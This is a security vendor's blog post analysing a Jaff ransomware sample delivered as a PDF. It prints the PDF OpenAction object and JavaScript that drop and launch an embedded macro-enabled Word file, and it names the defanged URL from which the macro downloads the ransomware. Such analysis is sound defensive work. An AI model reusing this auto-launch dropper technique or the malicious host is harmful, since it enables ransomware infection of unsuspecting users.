Blog

Jaff Ransomware Hiding in a PDF document

The challenge for a malware author today has more to do with creativity than a deep technical understanding. There are plenty of good trojan building tools out there to make the job easier. But once the author has a finished creation, the big challenge is how to get the finished product to the victims.

Embedding malware inside a Word document is by now commonplace. Typically this is in the form of a Macro launched by the ‘enable content’ function, also known as the ‘Please Infect My Machine’ feature. Malware authors have taken the next logical step by using a PDF document as the starting point.

A PDF is not only a fixed readable document. It has many more features like drawing and creating forms. Importantly for malware authors, a PDF document can interpret Javascript. Let’s have a look at the malware analysis where the author created a PDF document embedded with JavaScript that creates a Microsoft Word document with an embedded VBScript to execute Jaff Ransomware.

Jaff Ransomware Analysis

After uploading the innocent-looking “nm.pdf” file to the VMRay Analyzer, we got an extremely high VTI (VMRay Threat Identifier) Score: 100/100. To understand why the score is so high we start by looking at the VTI Information.

Jaff Ransomware - VTI Score
Figure 1: Jaff Ransomware VTI Score 100/100

The second entry suggests what the blog title already has hinted: “Rename multiple user files.” This is an indicator for an encryption attempt. We are certainly dealing with ransomware.

But how does it work? The PDF document isn’t able to run like an executable. In the VMRay Analyzer Report, we can go back to the overview page and look at the process graph.

Jaff Ransomware - Process Graph
Figure 2: Jaff Ransomware Process Graph

This shows us a truly new behavior when opening a PDF document.
First, to open the “nm.pdf” file, the Acrobat Reader process “acrord32.exe” starts and loads the PDF. Then a message pops up and asks to open a file “EQV6A.docm”. This message warns us against opening this file because it could potentially harm our computer.

Jaff Ransomware - Screenshot (1)
Figure 3: PDF wants to open a file

This works because the PDF document has an embedded JavaScript which starts when the document is opened.

<<
/Type/Catalog/Pages 9 0 R/Names 13 0 R/OpenAction
<< /S/JavaScript/JS(submarine();) >>
>>

Figure 4: PDF object shows open action

This object says: Start the JavaScript function “submarine()” on the “OpenAction”.

And inside the “submarine()” function is a function “abc” which references to “exportDataObject”.

This gets the parameters cName:“EQV6A.docm” and nLaunch:“2”. An nLaunch value of “2” directs Acrobat to save the file attachment to a temporary file and then asks the operating system to open it. An error will occur if the operating system has no program associated with that file type to open the exported file.

var dis = 2;
var abc = this['exportDataObject'];
function submarine() {
	abc({
		cName: "EQV6A.docm", nLaunch: dis
	});
};

Figure 5: The embedded Javascript in the PDF

In any event, VMRay Analyzer already has decided to open this file, which then starts the Word process “winword.exe” to load the “EQV6A.docm” file.

Jaff Ransomware - Screenshot (2)
Figure 6: Word – Social engineering to tempt the user to enable content

From here we can easily guess what happens next. That’s right, a Visual Basic macro starts and downloads an executable from hxxp://babil117.com/f87346b, also logged as the third entry in the VTI Information and shown in the grouped behavior section.

Jaff Ransomware - Download the Executable
Figure 7: Downloading the executable

After downloading, the Visual Basic macro starts the executable which then generates a new child process “pitupi20.exe” shown in the process graph. This is the most malicious part because after a while “pitupi20.exe” creates text and HTML files with a direct hint as to what can be expected next.

Jaff Ransomware - Decryptor
Figure 8: Jaff ransomware decryptor system

“Jaff decryptor system” lives up to its name and gives every encrypted file the suffix “.jaff”.

Jaff Ransomware - Txt Suffix
Figure 9: Suffix “.jaff” on a .Jpg file

Conclusion

A very creative construction of a malware was shown in this analysis. The malware author created a PDF document with an embedded JavaScript and an embedded Word document.

The PDF document starts the embedded Word document which then starts a Visual Basic macro to download and execute the “jaff decryptor system” (Ransomware). This is the malware equivalent of a Russian Matryoshka doll. But all this creative wrapping does not help it to evade the VMRay Analyzer.

View the Full Jaff Ransomware Analysis Report

References